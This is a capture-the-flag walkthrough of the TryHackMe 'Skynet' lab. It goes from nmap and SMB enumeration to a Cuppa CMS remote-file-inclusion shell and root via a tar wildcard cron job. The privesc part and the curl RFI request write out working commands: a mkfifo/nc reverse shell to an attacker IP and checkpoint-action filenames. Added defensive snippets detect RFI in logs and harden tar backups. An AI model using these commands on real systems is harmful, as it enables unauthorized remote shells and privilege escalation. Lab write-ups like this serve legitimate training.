Skynet - Tryhackme

Recon
Let's kick off the Nmap scan:
$ nmap -A -T4 -oN skynet.nmap.txt 10.10.0.50
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-26 14:28 EDT
Nmap scan report for 10.10.0.50
Host is up (0.081s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: CAPA UIDL RESP-CODES AUTH-RESP-CODE SASL PIPELINING TOP
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 post-login have LITERAL+ capabilities listed more IDLE SASL-IR OK ID LOGIN-REFERRALS ENABLE Pre-login IMAP4rev1
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2020-09-26T13:28:29-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-09-26T18:28:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.26 seconds

Let's enumerate Samba and, in parallel, kick off gobuster:
$ smbclient -L \\\\10.10.0.50
Enter WORKGROUP\eneloop's password:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      Skynet Anonymous Share
        milesdyson      Disk      Miles Dyson Personal Share
        IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

$ smbmap -H 10.10.0.50
[+] Guest session       IP: 10.10.0.50:445      Name: 10.10.0.50
        Disk            Permissions     Comment
        ----            -----------     -------
        print$          NO ACCESS       Printer Drivers
        anonymous       READ ONLY       Skynet Anonymous Share
        milesdyson      NO ACCESS       Miles Dyson Personal Share
        IPC$            NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

Enumeration
eneloop@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/skynet/data$ rpcclient -U "" -N 10.10.0.50
rpcclient $> enumdomusers
user:[milesdyson] rid:[0x3e8]
rpcclient $> queryuser 0x3e8
        User Name   :   milesdyson
        Full Name   :
        Home Drive  :   \\skynet\milesdyson
        Dir Drive   :
        Profile Path:   \\skynet\milesdyson\profile
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Wed, 31 Dec 1969 19:00:00 EST
        Logoff Time              :      Wed, 06 Feb 2036 10:06:39 EST
        Kickoff Time             :      Wed, 06 Feb 2036 10:06:39 EST
        Password last set Time   :      Tue, 17 Sep 2019 02:40:55 EDT
        Password can change Time :      Tue, 17 Sep 2019 02:40:55 EDT
        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
        unknown_2[0..31]...
        user_rid :      0x3e8
        group_rid:      0x201
        acb_info :      0x00000010
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...
rpcclient $>
Connect to the anonymous share and see whether we can download any files:
$ smbclient //10.10.0.50/anonymous
Enter WORKGROUP\eneloop's password:
Try "help" to get a list of possible commands.
smb: \>
smb: \> ls
  .                                   D        0  Wed Sep 18 00:41:20 2019
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs                                D        0  Wed Sep 18 00:42:16 2019
  books                               D        0  Wed Sep 18 00:40:06 2019

                9204224 blocks of size 1024. 5359276 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 00:42:16 2019
  ..                                  D        0  Wed Sep 18 00:41:20 2019
  log2.txt                            N        0  Wed Sep 18 00:42:13 2019
  log1.txt                            N      471  Wed Sep 18 00:41:59 2019
  log3.txt                            N        0  Wed Sep 18 00:42:16 2019

                9204224 blocks of size 1024. 5358756 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (1.4 KiloBytes/sec) (average 1.0 KiloBytes/sec)

The gobuster scan came back, and we notice the SquirrelMail web client is installed. Let's access Miles' emails.
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://10.10.0.50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.0.50
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/26 14:31:56 Starting gobuster
===============================================================
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)
/server-status (Status: 403)
===============================================================
2020/09/26 15:01:12 Finished
===============================================================

You may enter some rabbit holes, as I did, when you go through all the emails.

You will also find Miles' Samba password in one of the emails.

Exploit
The important.txt file we downloaded from the Samba share reveals that Miles was working on a new CMS: "Add features to beta CMS /45kra24zxs28v3yd". We should definitely enumerate this path and dig around it some more.
Run gobuster against the CMS path:
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://10.10.0.50/45kra24zxs28v3yd/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.0.50/45kra24zxs28v3yd/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/26 15:16:54 Starting gobuster
===============================================================
/administrator (Status: 301)
Progress: 18701 / 220561 (8.48%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/09/26 15:19:23 Finished
We have stumbled upon an interesting path here. Visit the /administrator path in the browser and inspect it; the login page tells us which CMS is running, which we then look up with searchsploit. I tried the passwords found so far and some default passwords, without any luck.

$ searchsploit cuppa
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         | Path
----------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion        | php/webapps/25971.txt
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Download pentestmonkey's php-reverse-shell script, update the IP address and listening port, and host it with Python's built-in HTTP server: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
$ python3 -m http.server 8999
Serving HTTP on 0.0.0.0 port 8999 (http://0.0.0.0:8999/) ...
10.10.0.50 - - [26/Sep/2020 15:34:28] "GET /shell.php HTTP/1.0" 200 -

Also, do not forget to start a listener with nc to catch the reverse shell:
$ nc -lvnp 9000
Now call the vulnerable page with curl or from the browser (the URL is quoted so the shell does not interpret the ? and = characters):
$ curl 'http://10.10.0.50/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.19.215:8999/shell.php'
You should now have a low-privilege shell as www-data and be able to read the user flag.
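The defender's view of the request above, added here and not part of the original walkthrough: a small log hunt that flags remote-file-inclusion attempts in an Apache access log, i.e. a query parameter whose value is itself a URL or PHP stream wrapper. The log lines, client address and user agents are constructed for the demo; the log format is the standard Apache combined format.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): hunt an Apache access log for
# RFI attempts such as alertConfigField.php?urlConfig=http://... . Sample lines
# below are constructed; only the first one is an inclusion attempt.
SAMPLE_LOG='10.10.0.1 - - [26/Sep/2020:15:34:28 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.19.215:8999/shell.php HTTP/1.1" 200 512 "-" "curl/7.72.0"
10.10.0.1 - - [26/Sep/2020:15:35:01 -0500] "GET /css/style.css HTTP/1.1" 200 2667 "-" "Mozilla/5.0"
10.10.0.1 - - [26/Sep/2020:15:35:09 -0500] "GET /admin/?page=home HTTP/1.1" 200 1024 "-" "Mozilla/5.0"'

# Write the constructed sample to the path given in $1 (so grep has a file).
write_sample_log() {
    printf '%s\n' "$SAMPLE_LOG" > "$1"
}

# Print every line whose request line carries a query value that starts with a
# URL scheme or PHP wrapper, with the colon either literal or percent-encoded.
# A benign value such as page=home never matches because it has no scheme.
rfi_hits() {
    grep -Ei '"(GET|POST) [^" ]*\?[^" ]*=(https?|ftp|php|data|expect)(:|%3a)' "$1"
}

# Number of flagged requests, handy for a triage count or a dashboard tile.
rfi_count() {
    rfi_hits "$1" | wc -l | tr -d ' '
}
```

Run it against the real log with `rfi_hits /var/log/apache2/access.log`; any hit naming an external host in `urlConfig=` is an inclusion attempt, and `allow_url_include=Off` in php.ini is the configuration that stops the include from fetching it.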
Post Exploit - Privesc
Download linpeas.sh and execute it.
You will notice an interesting script being run every minute by root. This is definitely something we can exploit:
*/1 * * * * root /home/milesdyson/backups/backup.sh
I was stuck here for some time. Then I referred to a walkthrough and came across this awesome way to exploit wildcarded tar commands:
https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.19.215 10000 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
$ ls -otr
total 64
-rw-r--r-- 1 www-data  2667 Sep 17  2019 style.css
-rw-r--r-- 1 www-data 25015 Sep 17  2019 image.png
-rw-r--r-- 1 www-data   523 Sep 17  2019 index.html
drwxr-xr-x 3 www-data  4096 Sep 17  2019 45kra24zxs28v3yd
drwxr-xr-x 2 www-data  4096 Sep 17  2019 config
drwxr-xr-x 2 www-data  4096 Sep 17  2019 admin
drwxr-xr-x 2 www-data  4096 Sep 17  2019 css
drwxr-xr-x 2 www-data  4096 Sep 17  2019 js
drwxr-xr-x 3 www-data  4096 Sep 17  2019 ai
-rwxr-xr-x 1 www-data    80 Sep 26 15:07 shell.sh
-rw-rw-rw- 1 www-data     0 Sep 26 15:13 --checkpoint-action=exec=sh shell.sh
-rw-rw-rw- 1 www-data     0 Sep 26 15:13 --checkpoint=1
$
Start another listener in a separate terminal so you can catch the incoming shell:
$ nc -lvnp 10000
listening on [any] 10000 ...
connect to [10.6.19.215] from (UNKNOWN) [10.10.0.50] 47110
/bin/sh: 0: can't access tty; job control turned off
You should now see the root shell.

Now that you have root access, proceed to read the root flag.
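The defender-side counterpart to the wildcard trick used above, added here and not part of the original walkthrough. It assumes backup.sh archives /var/www/html with a shell wildcard (tar cf ... *), which the page does not show; under that assumption it provides an audit for option-like filenames, an audit for scripts that hand a bare * to tar, and the hardened tar invocation that makes the trick inert.

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Assumption: the root cron job
# runs "tar cf backup.tgz *" inside /var/www/html, so any filename there that
# begins with '-' is expanded by the shell and parsed by tar as an option.

# Print each entry in directory $1 whose name begins with '-' (including dot
# files); return 1 if any were found, 0 if the directory is clean.
audit_option_names() {
    found=0
    for f in "$1"/* "$1"/.[!.]*; do
        [ -e "$f" ] || continue
        case "${f##*/}" in
            -*) printf 'option-like filename: %s\n' "$f"; found=1 ;;
        esac
    done
    return "$found"
}

# Print (with line numbers) every line of script $1 that passes a bare shell
# wildcard to tar; the hardened form below never matches.
audit_tar_globs() {
    grep -En '(^|[;&| ])tar[^;&|]*[[:space:]]\*([[:space:]]|$)' "$1"
}

# Hardened backup of directory $1 into archive $2: -C changes into the directory
# and '.' names its contents, so filenames never reach tar's command line and a
# file called --checkpoint=1 is stored as an ordinary member instead of parsed.
safe_backup() {
    tar -cf "$2" -C "$1" .
}
```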